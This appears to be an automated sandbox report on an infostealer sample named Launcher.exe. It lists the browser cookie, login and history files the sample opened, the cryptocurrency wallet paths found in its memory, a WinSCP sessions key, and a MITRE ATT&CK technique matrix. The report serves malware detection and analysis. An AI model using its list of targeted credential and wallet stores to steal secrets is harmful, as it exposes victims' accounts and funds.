          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Users\user\Desktop\Launcher.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite_tmp
          Source: C:\Users\user\Desktop\Launcher.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite_tmp

          Stealing of Sensitive Information

          Source: Yara match | File source: Process Memory Space: Launcher.exe PID: 6848, type: MEMORYSTR
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Electrum
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ElectronCash
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Electrum\wallets\
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty Wallet
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\window-state.json
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.conf.json
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: (insertion_info.second) == (true)
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\keystore\
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0683000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "author": "Exodus Movement, Inc.",
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \ElectronCash\wallets\default_wallet
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Ethereum
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \MultiDog\multidoge.wallet\
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\seed.seco
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
          Source: C:\Windows\System32\reg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies_tmp
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite_tmp-shm
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data_tmp
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite_tmp
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite_tmp-wal
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmp
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite_tmp-shm
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite_tmp-wal
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_tmp
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies_tmp
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmp
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
          Source: C:\Users\user\Desktop\Launcher.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite_tmp
          Source: C:\Users\user\Desktop\Launcher.exe | Directory queried: C:\Users\user\Documents
          Source: C:\Users\user\Desktop\Launcher.exe | File opened / queried: C:\Users\user\AppData\Roaming\.minecraft
          Source: Yara match | File source: 00000000.00000003.1474969662.00000174E0663000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Launcher.exe PID: 6848, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match | File source: Process Memory Space: Launcher.exe PID: 6848, type: MEMORYSTR
          | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
          | Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 12 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Obfuscated Files or Information | 1 Credentials in Registry | 14 System Information Discovery | Remote Desktop Protocol | 1 Browser Session Hijacking | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
          | Email Addresses | DNS Server | Domain Accounts | 11 Command and Scripting Interpreter | Logon Script (Windows) | 12 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | 22 Data from Local System | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
          | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Masquerading | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
          | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Modify Registry | LSA Secrets | 21 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
          | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
          | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
          Behavior graph (image not reproduced): Behavior Graph ID: 1632296, Sample: Launcher.exe, Startdate: 07/03/2025, Architecture: WINDOWS, Score: 100

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.